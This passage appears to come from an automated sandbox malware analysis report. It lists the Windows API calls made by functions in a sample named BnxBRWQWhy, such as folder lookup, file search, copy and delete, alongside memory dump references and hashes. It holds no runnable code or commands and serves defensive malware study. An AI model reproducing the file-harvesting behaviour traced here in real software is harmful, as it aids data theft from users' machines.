                                                            • Instruction Fuzzy Hash: 981127B2918118ABCB14DFC9DD45BBEB7F8FB8CB11F14425AF605A2280E3395940DBB1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `os
                                                            • API String ID: 0-2633975260
                                                            • Opcode ID: 115edcabb5af8ae97aec8708725c816f709b95cba0619726e99438678432c9aa
                                                            • Instruction ID: 97fe0d3f48704cfef679c1ef5e9d129b4182cf33d2745f6ee7a76a544e0be0aa
                                                            • Opcode Fuzzy Hash: 115edcabb5af8ae97aec8708725c816f709b95cba0619726e99438678432c9aa
                                                            • Instruction Fuzzy Hash: 9B6119B5D00219EFEB14DF94E988BEEB7B0BB04304F108598E51967282D739AF94DF91
                                                            APIs
                                                              • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00744BEA
                                                            • lstrcatA.KERNEL32(?,00FD0770), ref: 00744C08
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                                                              • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                                                              • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                                                              • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449B0
                                                              • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,007508D2), ref: 007449C5
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449E2
                                                              • Part of subcall function 00744910: PathMatchSpecA.SHLWAPI(?,?), ref: 00744A1E
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,00FCD870,?,000003E8), ref: 00744A4A
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FF8), ref: 00744A5C
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A70
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,00750FFC), ref: 00744A82
                                                              • Part of subcall function 00744910: lstrcatA.KERNEL32(?,?), ref: 00744A96
                                                              • Part of subcall function 00744910: CopyFileA.KERNEL32(?,?,00000001), ref: 00744AAC
                                                              • Part of subcall function 00744910: DeleteFileA.KERNEL32(?), ref: 00744B31
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 00744A07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID: Uat
                                                            • API String ID: 2104210347-3199785610
                                                            • Opcode ID: 0febf3912478305636c093ad31b381ccb5fbc01bceb736b02156454ab0684770
                                                            • Instruction ID: 9577e3a3cdb5435a6f1cccff07f28b861d4bd6d412b450f23255cf2890b8e1e8
                                                            • Opcode Fuzzy Hash: 0febf3912478305636c093ad31b381ccb5fbc01bceb736b02156454ab0684770
                                                            • Instruction Fuzzy Hash: 6F41B5B7504104ABD794FBA0EC46EEE333DA7C8700F40854CB54A96186EE796BCC9BD2
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • GetSystemTime.KERNEL32(?,00FC4B40,007505AE,?,?,?,?,?,?,?,?,?,00734963,?,00000014), ref: 00748B86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: SystemTimelstrcpy
                                                            • String ID: cIs$cIs
                                                            • API String ID: 62757014-1013043559
                                                            • Opcode ID: 16973c926b6d81e34edd282ed1c16546182dd4c7c3cedb6ad0a8803f0c907a40
                                                            • Instruction ID: 78e14bbaf73ce0e5edf59c794577ef2e966c5d8ffb7ff72b8bb4ec081d3c3359
                                                            • Opcode Fuzzy Hash: 16973c926b6d81e34edd282ed1c16546182dd4c7c3cedb6ad0a8803f0c907a40
                                                            • Instruction Fuzzy Hash: EB1186B2D04108EFDB05EFA8C8969EE77B9EF58300F14C059F51667251EF386945CBA2
                                                            APIs
                                                              • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00748E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0074508A
                                                            • lstrcatA.KERNEL32(?,00FD0090), ref: 007450A8
                                                              • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                                                              • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                            • String ID: at
                                                            • API String ID: 2699682494-3485432671
                                                            • Opcode ID: 1a80e5ee611bab14b1af46ec72c8a81bfa98dd2a99d60225e41def716a378be7
                                                            • Instruction ID: 8f9950a4313379b52b21325dff564d5ea506615134761e0584377ff80a0ffc93
                                                            • Opcode Fuzzy Hash: 1a80e5ee611bab14b1af46ec72c8a81bfa98dd2a99d60225e41def716a378be7
                                                            • Instruction Fuzzy Hash: 7901DB77914208E7D754FB70DC46EEE333CAB94300F404144B65952181EF78AAC89BD3